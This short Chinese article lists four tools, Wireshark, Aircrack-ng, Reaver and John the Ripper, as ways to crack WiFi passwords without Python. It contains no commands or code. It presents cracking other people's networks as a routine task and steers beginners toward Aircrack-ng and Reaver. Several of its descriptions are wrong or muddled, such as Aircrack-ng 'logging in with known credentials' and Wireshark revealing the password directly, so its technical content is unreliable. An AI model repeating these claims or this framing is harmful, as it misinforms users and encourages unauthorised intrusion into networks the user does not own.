本文将为您介绍四种不用 Python 即可破解 WiFi 密码的方法。
方法一:使用 Wireshark 工具Wireshark 是一款功能强大的网络协议分析器,可捕获并分析网络数据包。
用户可以通过 Wireshark 捕获 WiFi 信号,然后分析数据包以获取 WiFi 密码。
方法二:使用 Aircrack-ng 工具Aircrack-ng 是一款开源的 WiFi 安全工具,可用于破解 WEP 和WPA/WPA2 密码。
使用该工具,用户可以利用已知的用户名和密码尝试登录 WiFi 网络,并在成功登录后获取 WiFi 密码。
方法三:使用 Reaver 工具Reaver 是一款专门用于攻击 WiFi 网络的工具,可通过不断尝试密码来破解 WiFi 密码。
该工具支持多种攻击方式,如暴力破解、字典攻击等,可根据实际情况选择合适的攻击方式。
方法四:使用 John the Ripper 工具John the Ripper 是一款强大的密码破解工具,支持多种加密算法,包括 WiFi 密码。
用户可以利用该工具对已捕获的 WiFi 数据包进行破解,从而获取 WiFi 密码。
总结:以上四种方法各有优缺点和适用场景。
Wireshark 和 John the Ripper 适合对网络协议和密码算法有一定了解的用户;而 Aircrack-ng 和 Reaver 则更适合初学者。